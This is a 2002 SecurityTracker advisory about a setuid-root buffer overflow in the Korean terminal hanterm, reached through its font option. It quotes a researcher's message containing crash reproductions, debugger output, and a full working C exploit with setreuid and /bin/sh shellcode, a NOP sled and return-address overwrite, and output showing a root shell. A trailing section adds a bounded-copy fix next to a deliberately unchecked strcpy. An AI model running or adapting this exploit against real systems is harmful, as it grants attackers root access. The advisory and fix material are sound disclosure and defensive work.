(Exploit Details are Provided) Re: Hanterm Korean Language Xterm Utility Lets Local Users Compromise the System and Obtain Root Level Privileges
SecurityTracker Alert ID: 1003243
SecurityTracker URL: http://securitytracker.com/id/1003243
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jan 15 2002
Impact:
Execution of arbitrary code via local system, Root access via local system
Exploit Included: Yes

Description:
A vulnerability has been discovered in hanterm that allows local users to obtain root level privileges on the system.
It is reported that the hanterm binary is installed with set user id (setuid) root permissions. This allows local users to execute commands with root level privileges.
Exploit details and a demonstration exploit script are provided in the Source Message.

Impact:
A local user can execute commands with root level privileges, giving the local user root level access on the host.

Solution:
FreeBSD has released a fix.
The FreeBSD advisory is available at:
http://security.freebsd.org/advisories/FreeBSD-SA-01:41.hanterm.asc

Cause:
Boundary error

Underlying OS:
Linux (Any), UNIX (Any)

Message History:
This archive entry is a follow-up to the message listed below.

Source Message Contents

Date: Wed, 09 Jan 2002 22:58:26 -0500
Subject: hanterm exploit
-------- Original Message --------
From: "you dong-hun" <szoahc@hotmail.com>
title: "XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm, xterm Buffer Overflow bug."
To discover already? I will not know well.
It tried to write the contents which I know.
It cannot English and it is sorry. T.T
It is like that, toil. ;-D
Attachment: hanterm,xterm.txt
XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm, xterm Buffer Overflow bug.
The hanterm is the vt100/220 emulator where the Korean alphabet input-output is possible from, X Window environment. The Korean alphabet input-output from the representative program which, it does was not becoming international anger from X and window in order to express the Korean alphabet from the application program which is different that source boiled reference toy frequently.
Problem only the hanterm knows exists even in the xterm.
The attack happens from fontname option.
When it uses -fn option, contents of the Stack the authority acquisition of Overflow making option is possible.
The hanterm and the xterm are the linux 7.x from default setuid set toy.
* Reference: hanterm-dev home page URL: http://elf.kaist.ac.kr/hanterm/
* Annual festival of easy attack:
X -version (1)
[x82@xpl017elz x82]$ X -version
XFree86 Version 3.3.5 / X Window System
(protocol Version 11, revision 0, vendor release 6300)
Release Date: August 23 1999
If the server is older than 6-12 months, or if your card is newer
than the above date, look for a newer version before reporting
problems. (see http://www.XFree86.Org/FAQ)
Operating System: Linux 2.2.12-20kr2smp i686 [ELF]
[x82@xpl017elz x82]$
hanterm:
[x82@xpl017elz x82]$ hanterm -display 61.xx.177.27:0 -fn `perl -e 'print "x"x88'`
Segmentation fault
[x82@xpl017elz x82]$
xterm:
[x82@xpl017elz x82]$ xterm -display 61.37.177.27:0 -fn `perl -e 'print "x"x99999'`
[x82@xpl017elz x82]$
There is not anyone problem.
X -version (2)
[x82@xpl017elz x82]$ X -version
XFree86 Version 4.0.2 / X Window System
(protocol Version 11, revision 0, vendor release 6400)
Release Date: 18 December 2000
If the server is older than 6-12 months, or if your card is
newer than the above date, look for a newer version before
reporting problems. (See http://www.XFree86.Org/FAQ)
Operating System: Linux 2.2.17-8krenterprise i686 [ELF]
Module Loader present
[x82@xpl017elz x82]$
hanterm:
[x82@xpl017elz x82]$ ls -la /usr/X11R6/bin/hanterm
-rwsr-xr-x 1 root root 169852 Oct 9 2000 /usr/X11R6/bin/hanterm
[x82@xpl017elz x82]$ hanterm -display 61.xx.177.27:0 -fn `perl -e 'print "x"x112'`
Segmentation fault (core dumped)
[x82@xpl017elz x82]$
xterm:
[x82@xpl017elz x82]$ gdb -q xterm
(no debugging symbols found)...(gdb) r -display 61.xx.177.27:0 -fn `perl -e 'print "x"x326'`
Starting program: /usr/X11R6/bin/xterm -display 61.xx.177.27:0 -fn `perl -e 'print "x"x326'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x80552cb in strcpy () at ../sysdeps/generic/strcpy.c:31
31 ../sysdeps/generic/strcpy.c: No such file or directory.
(gdb) where
#0 0x80552cb in strcpy () at ../sysdeps/generic/strcpy.c:31
#1 0x5 in ?? ()
#2 0x400d75a3 in XtGetClassExtension () from /usr/X11R6/lib/libXt.so.6
#3 0x400d777e in XtGetClassExtension () from /usr/X11R6/lib/libXt.so.6
#4 0x400d7881 in XtRealizeWidget () from /usr/X11R6/lib/libXt.so.6
#5 0x8054819 in strcpy () at ../sysdeps/generic/strcpy.c:31
#6 0x806cba6 in strcpy () at ../sysdeps/generic/strcpy.c:31
#7 0x806c53a in strcpy () at ../sysdeps/generic/strcpy.c:31
#8 0x40281bfc in __libc_start_main (main=0x806bc20 <strcpy+128284>, argc=5,
ubp_av=0xbffff974, init=0x804b6ac <_init>, fini=0x806e64c <_fini>,
rtld_fini=0x4000d674 <_dl_fini>, stack_end=0xbffff96c)
at ../sysdeps/generic/libc-start.c:118
(gdb) q
The program is running. Exit anyway? (y or n) y
[x82@xpl017elz x82]$ ls -la /usr/X11R6/bin/xterm
-rwsr-xr-x 1 root root 224132 Jan 11 2001 /usr/X11R6/bin/xterm
[x82@xpl017elz x82]$
* /usr/X11R6/bin/hanterm overflow exploit:
=======================================
/*
**
** How to exploit?
**
** [x82@xpl017elz x82]$ cp /usr/X11R6/bin/hanterm .
** [x82@xpl017elz x82]$ gdb -q hanterm
** (no debugging symbols found)...(gdb) r -display 61.xx.177.27:0 -fn `perl -e 'print "x"x80'`
**
** Starting program: /home/noname/hanterm -display 61.xx.177.27:0 -fn `perl -e 'print "x"x80'`
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...
** Program received signal SIGSEGV, Segmentation fault.
** 0x80520e6 in strcpy () at ../sysdeps/generic/strcpy.c:30
** 30 ../sysdeps/generic/strcpy.c: 그런 파일이나 디렉토리가 없음.
** (gdb) info reg $esp
** esp 0xbfffe6b8 -1073748296
** (gdb) x/80 0xbffffb00
** 0xbffffb00: 0x65746e61 0x2d006d72 0x70736964 0x0079616c
** 0xbffffb10: 0x332e3136 0x37312e37 0x37322e37 0x2d00303a
** 0xbffffb20: 0x78006e66 0x78787878 0x78787878 0x78787878
** 0xbffffb30: 0x78787878 0x78787878 0x78787878 0x78787878
** 0xbffffb40: 0x78787878 0x78787878 0x78787878 0x78787878
** 0xbffffb50: 0x78787878 0x78787878 0x78787878 0x78787878
** 0xbffffb60: 0x78787878 0x78787878 0x78787878 0x78787878
** 0xbffffb70: 0x00787878 0x5353454c 0x4e45504f 0x656c7c3d
** ... ... ... ... ...
** 0xbffffc10: 0x2d2a2d36 0x3563736b 0x2e313036 0x37383931
** 0xbffffc20: 0x2d2c302d 0x6f6b2d2a 0x2d676964 0x6964656d
** 0xbffffc30: 0x722d6d75 0x726f6e2d 0x2d6c616d 0x2d38312d
** (gdb)
**
** Buffer Structure
**
** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte
**
** The return until the address the whole it contains and,
** it puts in an option.
**
** [x82@xpl017elz x82]$ ./exploit
**
** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
**
** Exploit made by Xpl017Elz
**
** Display HOST_IP: 255.255.255.255:0
** Jumping Address: 0xbffffb74
**
** Segmentation fault
** [x82@xpl017elz x82]$
**
** It calculates the offset.
** Namely, when 0xbffffb20 from 0xbffffb70 until it catches in between,
** it will be suitable.
**
** [x82@xpl017elz x82]$ ./exploit -a 61.xx.177.27:0 -o 2370 -b 88
**
** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
**
** Exploit made by Xpl017Elz
**
** Display HOST_IP: 61.xx.177.27:0
** Jumping Address: 0xbffffb26
**
** bash#
**
** Ooops! it's rootshell :-)
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy */
#include <strings.h>  /* bzero */
#include <unistd.h>   /* getopt, optarg, execl */
#define NOP 0x90
#define DFOFS 2400
#define DFIP "255.255.255.255:0"
#define DFBUF 88
/*
** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte
*/
char shellcode[] = /* 53byte shellcode */
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* setreuid(0,0); */
"\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46"
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd"
"\x80\xe8\xde\xff\xff\xff/bin/sh";
void usages(char *var);
void banrl(void);
unsigned long sp(void) {
    __asm__("movl %esp,%eax");   /* current stack pointer is returned in eax (i386 only) */
}
int main(int argc, char *argv[]) {
    int rufp, fpru, jobst,
        ferbuf, num = DFBUF,
        ofs = DFOFS;
    long addr;
    char buffer[2000],
         hoip[] = DFIP;
    extern char *optarg;
    banrl();
    while ((jobst = getopt(argc, argv, "a:o:b:")) != EOF)
        switch (jobst) {
        case 'a': strcpy(hoip, optarg);
                  break;
        case 'o': ofs = atoi(optarg);
                  break;
        case 'b': num = atoi(optarg);
                  break;
        case '?': usages(argv[0]);
                  exit(0);
        }
    printf(" Display HOST_IP: %s\n", hoip);
    addr = sp() + ofs; // -ofs;
    printf(" Jumping Address: %p\n\n", addr);
    ferbuf = num - sizeof(shellcode) - 4;
    bzero(&buffer, 2000);
    for (rufp = 0; rufp <= ferbuf; rufp++) {
        buffer[rufp] = NOP;
    }
    for (fpru = 0; fpru <= 52; fpru++) {
        buffer[rufp++] = shellcode[fpru];
    }
    buffer[rufp++] = addr & 0xff;
    buffer[rufp++] = addr >> 8 & 0xff;
    buffer[rufp++] = addr >> 16 & 0xff;
    buffer[rufp++] = addr >> 24 & 0xff;
    execl("/usr/X11R6/bin/hanterm", "hanterm",
          "-display", hoip, "-fn", buffer, NULL);
    exit(0);
}
void usages(char *var) {
    printf("\n Usage:\n %s -a [host_ip:0] -o [offset] -b [buffer size] (data addr~ return addr)\n", var);
    printf(" Default: %s -a 61.xx.177.27:0 -o 2400 -b 88\n\n", var);
}
void banrl(void) {
    printf("\n XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit\n");
    printf(" Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte\n\n");
    printf("\t\t\t Exploit made by Xpl017Elz\n\n");
}
_end of file_=====================================================================
Found long ago. :-]
However, it was not done how much that do exploit to heighten batting average.
Decide and attack buffer that is input through simple option.
That cover through offset & shellcode address decide can.
That succeed to exploit by all means ...
Author: Xpl017Elz
E-mail: szoahc@hotmail.com & xploit@hackermail.com
Home: http://x82.i21c.net
P.S: Always so ...
Sorry. I gave up original English.
Study English since next time. So, make understood other people.
Thank you for reading unwise writing. ^-^*
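The defect the message demonstrates is a fixed stack buffer filled by an unbounded copy of the -fn argument. The program below is an added example, not part of the advisory or of hanterm's code: it shows that pattern next to a bounded copy that rejects names which do not fit, checked with constructed probes at the lengths the page uses. FONT_NAME_MAX, the 80-byte size (taken from the message's stack diagram) and all function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Assumed size: the advisory's stack diagram shows an 80-byte data area
 * before the saved ebp and return address. Hypothetical names throughout. */
#define FONT_NAME_MAX 80

/* The reported pattern: unbounded strcpy of the -fn argument into a fixed
 * stack buffer. Fine for short names; anything longer overwrites the saved
 * ebp and return address, hence the 88-byte crash on the page. For
 * contrast only; never call it with oversized input. */
int unchecked_font_len(const char *fn)
{
    char font[FONT_NAME_MAX];
    strcpy(font, fn);                /* no bound: the "boundary error" */
    return (int)strlen(font);
}

/* Hardened form: copy only if the name and its NUL fit in out[]. Returns 0
 * on success, -1 if rejected. Rejecting beats truncating: a silently
 * shortened font name is a different font. */
int copy_font_name(const char *fn, char *out, size_t outsz)
{
    const char *nul = memchr(fn, '\0', outsz);   /* reads at most outsz bytes */
    if (nul == NULL)
        return -1;                   /* no terminator within outsz: too long */
    memcpy(out, fn, (size_t)(nul - fn) + 1);
    return 0;
}
/* Constructed probe of `len` 'x' bytes, like the page's perl -e 'print "x"x88'.
 * Returns 1 if the hardened copy accepts it, 0 if it rejects it. */
int probe_accepted(size_t len)
{
    char font[FONT_NAME_MAX], *name = malloc(len + 1);
    int ok;
    if (name == NULL)
        return 0;
    memset(name, 'x', len);
    name[len] = '\0';
    ok = (copy_font_name(name, font, sizeof font) == 0);
    free(name);
    return ok;
}
int main(void)
{
    size_t probes[] = { 16, 79, 80, 88, 112 };   /* 88 and 112 crash hanterm on the page */
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%3zu-byte -fn name: %s\n", probes[i],
               probe_accepted(probes[i]) ? "accepted" : "rejected");
    return 0;
}
```

Any name of 80 bytes or more is refused before it reaches the buffer, which is the check the setuid binary lacked; removing the setuid bit, as the advisory's fix does, limits what an overflow can gain even where such a check is missing.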